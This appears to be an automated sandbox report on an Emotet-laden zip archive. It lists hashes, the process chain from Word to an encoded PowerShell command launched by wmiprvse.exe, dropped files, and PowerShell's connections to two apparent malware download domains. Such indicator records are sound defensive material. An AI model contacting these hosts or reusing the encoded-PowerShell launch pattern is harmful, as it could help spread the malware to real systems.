File name: | f8ee5044ff1c81384ecdd4735d5f8d0d93bee834.zip |
Full analysis: | https://app.any.run/tasks/f0add28d-d680-41b2-8f84-5cdfa92bb602 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into a highly destructive piece of malware. It mostly targets corporate victims, but private users also get infected through mass spam email campaigns. |
Analysis date: | September 19, 2019, 06:18:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 70DCDBE1E0186FBE98375B72FAC5C5AD |
SHA1: | 695F67AB37C34F3D539517846EF5F1E01B4874BB |
SHA256: | 58CD281561DAB7638621EBDBF67D0A88CED6D8186201847FEE88B30E768FCA3E |
SSDEEP: | 3072:HQTXsCiaXMT+rF3xrUc5uQJCFgIdhZFo2B8wDT1:bnAc+B3x5w+oLy2BZDp |
.zip | ZIP compressed archive (100) |
---|---|
ZipRequiredVersion: | 20 |
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:09:18 18:48:15 |
ZipCRC: | 0x0164785e |
ZipCompressedSize: | 168522 |
ZipUncompressedSize: | 328128 |
ZipFileName: | f8ee5044ff1c81384ecdd4735d5f8d0d93bee834 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3556 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\f8ee5044ff1c81384ecdd4735d5f8d0d93bee834.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3608 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\test.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3544 | powershell -encod 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF1D7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A953A6A.wmf | wmf | |
MD5:56D945AAC03C961807122960C165C060 | SHA256:FA3C988A8A6319D173C720EBA9F66A3CE67EC605F3FCCC8EB604F7B552F21151 | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:1932E642BF49688FF8AAD32BE63B1B34 | SHA256:150E7C5A0F81609374EBE46AF172770E364023C1A723A5AF4E245CA6B68FE649 | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\test.doc.LNK | lnk | |
MD5:4B6696D5583996B1E177EA2ADBA50ADE | SHA256:D630D572D08F4F37C92BE1568D651DED098FB65CCC44217F74E6DB6E68FDFF14 | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32AEE669.wmf | wmf | |
MD5:5C4F83E134A72503FCF81E7E63F4F4AD | SHA256:E6B63B63938C82998B52AB441245F483F24AF2CAE8C6CC60DBF4A5E8CB491F7D | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26553D5F.wmf | wmf | |
MD5:A98D69A6BC6F4FA0508C1BB2A8F6C66B | SHA256:6E12BE59FFFD2CE32FCBC45DB9D596697CE6A0B7979D47AB4C95B310F549615E | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BACA0ACD.wmf | wmf | |
MD5:8E6DEF5B61985AAA923C8E4E256082EC | SHA256:D54FC5860A92CD9FEDF3A1A3A83876C60EF282C3729C5625FC97BDEAA52452EC | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:317ED78CB6799C0D98E0C3A06DC2F53F | SHA256:1D238A9DBE4B9B7A9F02251CE66BEA984D8D20AE43F4EADE452BB84ABB65DF73 | |||
3556 | WinRAR.exe | C:\Users\admin\Desktop\f8ee5044ff1c81384ecdd4735d5f8d0d93bee834 | document | |
MD5:75FCE03112C190FE3405473CAC28502D | SHA256:44D88CC1429253B00B514D1594422D22C7A0E08523D06CF756E6606A852D6ED8 | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6350DC5.wmf | wmf | |
MD5:2FCE5B8B6A3A0D34C293CE21237B0F3D | SHA256:52005A145BACF54D39B82EC7299B897AC7AE83E4C8CB4D87C8701D71950FEF28 | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3544 | powershell.exe | 104.27.132.144:443 | mnpasalubong.com | Cloudflare Inc | US | shared |
3544 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
Domain | IP | Reputation |
---|---|---|
thinhvuongmedia.com | | suspicious |
dns.msftncsi.com | | shared |
mnpasalubong.com | | unknown |